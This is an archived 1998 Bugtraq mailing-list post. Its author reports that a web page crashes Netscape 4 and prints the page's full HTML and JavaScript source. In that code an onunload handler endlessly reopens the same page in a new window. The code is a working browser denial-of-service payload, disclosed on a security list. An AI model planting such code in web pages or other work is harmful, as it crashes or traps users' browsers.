[6417] in bugtraq

home help back first fref pref prev next nref lref last post

Re: More browser bugs.

daemon@ATHENA.MIT.EDU (Matt Drown)
Mon Mar 30 16:28:00 1998

Date: 	Sat, 28 Mar 1998 03:34:25 GMT
Reply-To: Matt Drown <panzer@DHP.COM>
From: Matt Drown <panzer@DHP.COM>
To: BUGTRAQ@NETSPACE.ORG

Perhaps there needs to a bugtraq-browsers, or a bugtraq-javascript....
www.dhp.com/~panzer/evil.html crashes netscape4 on SunOS and NT without a
problem.  IE4 deals properly.

<html><head>
<title> Evil </title>
<script language="JavaScript">
 var exit=true;
 function xit()
 {
 if (exit)
 open("http://www.dhp.com/~panzer/evil.html","DisplayWindow","width=50,height=20");
 }
</script>
</head>
<body onunload="xit()">
<blink>Evil</blink>
</body>

I don't know javascript, I'm just pasting things together after being
annoyed with banner advertisements that didn't go away.  When I figured
out what they were doing, I tried this.
--
-Matt Drown     -- Privacy, Anonyminity, & Security -- DataHaven Project
 panzer@dhp.com -- Shell and Web accounts           -- http://www.dhp.com/

home help back first fref pref prev next nref lref last post